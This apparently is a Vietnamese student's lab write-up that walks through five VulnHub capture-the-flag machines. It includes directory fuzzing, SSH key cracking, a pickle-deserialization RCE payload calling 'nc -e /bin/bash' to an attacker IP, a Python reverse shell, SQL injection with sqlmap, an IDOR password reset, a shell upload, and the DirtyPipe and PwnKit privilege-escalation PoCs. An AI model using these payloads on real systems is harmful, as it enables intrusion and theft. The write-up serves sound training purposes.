Kiểm thử & Đánh giá ATHTTT

# Kiểm thử & Đánh giá ATHTTT ## Lab 6: [LUPINONE](https://www.vulnhub.com/entry/empire-lupinone,750/) ![](https://i.imgur.com/rgVcn7g.png) ![](https://i.imgur.com/md4tUA6.png) ```bash dirb http://192.168.233.133 ``` ![](https://i.imgur.com/jfeH1S3.png) ![](https://i.imgur.com/sy2YgdS.png) ![](https://i.imgur.com/p5zMxLq.png) ```bash ffuf -u "http://192.168.233.133/~FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -mc 200,301,302 ``` ![](https://i.imgur.com/qU51vRw.png) ```bash ffuf -u "http://192.168.233.133/~secret/.FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -mc 200,301,302 -fs 331 -e .txt ``` ![](https://i.imgur.com/EDO5woq.png) ``` -----BEGIN OPENSSH PRIVATE KEY----- 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 iUJ66WmRUN9EoVlkeCzQJwivI= -----END OPENSSH PRIVATE KEY----- ``` ![](https://i.imgur.com/w6yLixd.png) ```bash= #!/usr/bin/env bash wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/ssh2john.py python3 ssh2john.py privatekey > passwd john --wordlist=password.txt passwd ``` ![](https://i.imgur.com/rHfXIF3.png) ![](https://i.imgur.com/srTdWmF.png) ![](https://i.imgur.com/ZdBEmhQ.png) ``` 3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny} ``` ```bash wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh chmod +x linpeas.sh ./linpeas.sh ``` ![](https://i.imgur.com/TbaFU7J.png) ![](https://i.imgur.com/aq9pkHY.png) POC: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits ```bash git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits chmod +x compile.sh ./compile.sh ``` ![](https://i.imgur.com/0WIIQKX.png) ![](https://i.imgur.com/2GelWrx.png) ![](https://i.imgur.com/PCVm330.png) ``` 3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box} ``` ## Lab 7: [PHINEAS: 1](https://www.vulnhub.com/entry/phineas-1,674/) ![](https://i.imgur.com/D5fLc1c.png) ![](https://i.imgur.com/uHioZei.png) ![](https://i.imgur.com/I7NLZCX.png) ```bash ffuf -u http://192.168.233.134/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e .txt,.html,.php -fc 403 ``` ![](https://i.imgur.com/K2CxiOl.png) ![](https://i.imgur.com/fvC28Qw.png) ``` ffuf -u http://192.168.233.134/structure/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e .txt,.html,.php -fc 403 -fs 9288 ``` ![](https://i.imgur.com/1lp1lKd.png) ![](https://i.imgur.com/FyodyoT.png) POC https://github.com/padsalatushal/CVE-2018-16763 ```bash git clone https://github.com/Trushal2004/CVE-2018-16763.git cd CVE-2018-16763/ python3 -m pip install -r requirements.txt chmod +x exploit.py ./exploit.py ``` ![](https://i.imgur.com/kAmiSoe.png) Đọc thông tin trong database ```bash cat /var/www/html/structure/fuel/application/config/database.php ``` ![](https://i.imgur.com/CygrKfA.png) ``` anna H993hfkNNid5kk ``` ![](https://i.imgur.com/Gdc8D8s.png) ![](https://i.imgur.com/o4V2lzj.png) ``` cat ./Desktop/user.txt ``` ``` c2Vpc2VtcHJlbmVsbWlvY3VvcmVtYW1tYQ ``` ![](https://i.imgur.com/zGGYyLJ.png) ```python2= #!/usr/bin/python3 import pickle import base64 from flask import Flask, request app = Flask(__name__) @app.route("/heaven", methods=["POST"]) def heaven(): data = base64.urlsafe_b64decode(request.form['awesome']) pickle.loads(data) return '', 204 ``` Payload: https://gist.github.com/kriss-u/085569495cb930e398759c0cbf45e3b7 ```python3= #!/usr/bin/env python3 import pickle import sys import base64 DEFAULT_COMMAND = "nc -e /bin/bash 192.168.233.131 4444" COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND class PickleRce(object): def __reduce__(self): import os return (os.system,(COMMAND,)) print(base64.b64encode(pickle.dumps(PickleRce())).decode('utf-8')) ``` ```bash curl -d "awesome=$(python3 exp.py)" -X POST http://127.0.0.1:5000/heaven ``` ![](https://i.imgur.com/plnm5uu.png) ![](https://i.imgur.com/alsDcx3.png) ``` YW5uYW1hcmlhbmljb3NhbnRpdml2ZSE ``` ## Lab 8: [DarkHole2](https://www.vulnhub.com/entry/darkhole-2,740/) ![](https://i.imgur.com/woVVjfy.png) ![](https://i.imgur.com/v98sjRd.png) ![](https://i.imgur.com/aUOvKGQ.png) ```bash ffuf -u http://192.168.233.135/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e .txt,.html,.php ``` ![](https://i.imgur.com/cLxTdGs.png) ![](https://i.imgur.com/y89NpcU.png) Download `.git` Folder: https://github.com/arthaud/git-dumper ``` git-dumper http://192.168.233.135/.git/ ~/lab8 ``` ![](https://i.imgur.com/BlScrPO.png) ``` git show ``` ![](https://i.imgur.com/PDPWHZV.png) Account: ``` lush@admin.com 321 ``` ![](https://i.imgur.com/8VNQPP7.png) ![](https://i.imgur.com/cfpoBCD.png) ![](https://i.imgur.com/l0X1IP9.png) PHP Deobfuscator: https://www.unphp.net/decode/2b860fdd6a2eba03306e40a72bbcef50/ ![](https://i.imgur.com/C1GN4RD.png) SQLi: ```bash sqlmap -u http://192.168.233.135/dashboard.php?id=1 --dbms=MySQL --cookie='PHPSESSID=osnso45repgpotndbuv4sveopa' --dump ``` ![](https://i.imgur.com/tHigb1o.png) ![](https://i.imgur.com/VPzaf0I.png) ![](https://i.imgur.com/wmaLfsV.png) ``` DarkHole{'This_is_the_life_man_better_than_a_cruise'} ``` ```bash bash <(curl -Ls https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh) ``` ![](https://i.imgur.com/lQFhPNw.png) ![](https://i.imgur.com/LRY72p2.png) POC: https://github.com/berdav/CVE-2021-4034 ![](https://i.imgur.com/nYJDp8E.png) ![](https://i.imgur.com/D77Lp90.png) ``` DarkHole{'Legend'} ``` ## Lab 9: [DarkHole1](https://www.vulnhub.com/entry/darkhole-1,724/) ![](https://i.imgur.com/MeyC6Qc.png) ![](https://i.imgur.com/fHqsABw.png) ![](https://i.imgur.com/zgr9W2e.jpg) Đăng kí tài khoản: ``` 123 123 ``` ![](https://i.imgur.com/mD6jQ7e.png) ![](https://i.imgur.com/94pnWqG.png) ![](https://i.imgur.com/9SqeXMT.png) Đổi password của admin bằng cách thay đổi giá trị của id thành 1: ``` curl 'http://192.168.233.136/dashboard.php?id=2' -X POST -H 'Content-Type: application/x-www-form-urlencoded' -H 'Cookie: PHPSESSID=gm0g20809ruhkmsmukkcqs349m' --data-raw 'password=123&id=1' ``` ![](https://i.imgur.com/jTbcRU4.png) ![](https://i.imgur.com/kaKzRud.png) Upload shell ```bash! curl 'http://192.168.233.136/dashboard.php?id=1' -X POST -H 'Content-Type: multipart/form-data; boundary=---------------------------25708402183965634671211838103' -H 'Cookie: PHPSESSID=gm0g20809ruhkmsmukkcqs349m' --data-binary $'-----------------------------25708402183965634671211838103\r\nContent-Disposition: form-data; name="fileToUpload"; filename="shell.phtml"\r\nContent-Type: text/plain\r\n\r\n-----------------------------25708402183965634671211838103--\r\n' ``` ![](https://i.imgur.com/YFOJDjY.png) ![](https://i.imgur.com/uigTALy.png) Reverse shell: ```bash python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.233.131",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' ``` ![](https://i.imgur.com/QGl6vt8.png) ``` DarkHole{You_Can_DO_It} ``` ![](https://i.imgur.com/R4ytI6H.png) Password của john: `root123` ![](https://i.imgur.com/bOPKWwS.png) ![](https://i.imgur.com/nOhbbnU.png) ![](https://i.imgur.com/cnz3TpA.png) ![](https://i.imgur.com/q3fz5Yg.png) ``` DarkHole{You_Are_Legend} ``` ## Lab 10: [Prime 1](https://www.vulnhub.com/entry/prime-1,358/) ![](https://i.imgur.com/wnwkbmF.png) ![](https://i.imgur.com/d2DyvHP.png) ![](https://i.imgur.com/fnAA8Kb.png) ![](https://i.imgur.com/dZFk8su.png) ![](https://i.imgur.com/ef68vs6.png) ![](https://i.imgur.com/ssHUQ3A.png) ![](https://i.imgur.com/ucyiJsa.png) ![](https://i.imgur.com/ga2lpFK.png) ![](https://i.imgur.com/tLLbyv3.png) ![](https://i.imgur.com/VBdguj7.png) ![](https://i.imgur.com/kVHT0XN.png) ![](https://i.imgur.com/qT3qfDK.png) ![](https://i.imgur.com/Z0ZqMKs.png) ``` af3c658dcf9d7190da3153519c003456 ``` Run linpeas.sh ![](https://i.imgur.com/oxG1APT.png) POC: https://github.com/berdav/CVE-2021-4034 ![](https://i.imgur.com/jOv9hzr.png) ``` b2b17036da1de94cfb024540a8e7075a ```